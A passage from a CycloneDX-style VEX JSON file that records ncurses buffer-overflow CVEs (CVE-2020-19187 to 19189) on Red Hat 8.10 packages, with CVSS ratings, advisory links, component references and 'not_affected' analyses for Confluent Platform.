          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19187",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in fmt_entry function in progs/dump_entry.c:1100 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19187"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19187"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc3.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19187"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19187"
        }
      ],
      "published": "2023-08-22T19:15:59+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2020-19188",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in fmt_entry function in progs/dump_entry.c:1116 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19188"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19188"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc4.md"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19188"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19188"
        }
      ],
      "published": "2023-08-22T19:16:00+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2020-19189",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Buffer Overflow vulnerability in postprocess_terminfo function in tinfo/parse_entry.c:997 in ncurses 6.1 allows remote attackers to cause a denial of service via crafted command.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2020-19189"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/10"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/11"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/Dec/9"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2020-19189"
        },
        {
          "url": "https://github.com/zjuchenyuan/fuzzpoc/blob/master/infotocap_poc5.md"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00033.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-19189"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231006-0005/"
        },
        {
          "url": "https://support.apple.com/kb/HT214036"
        },
        {
          "url": "https://support.apple.com/kb/HT214037"
        },
        {
          "url": "https://support.apple.com/kb/HT214038"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6451-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2020-19189"
        }
      ],
      "published": "2023-08-22T19:16:01+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
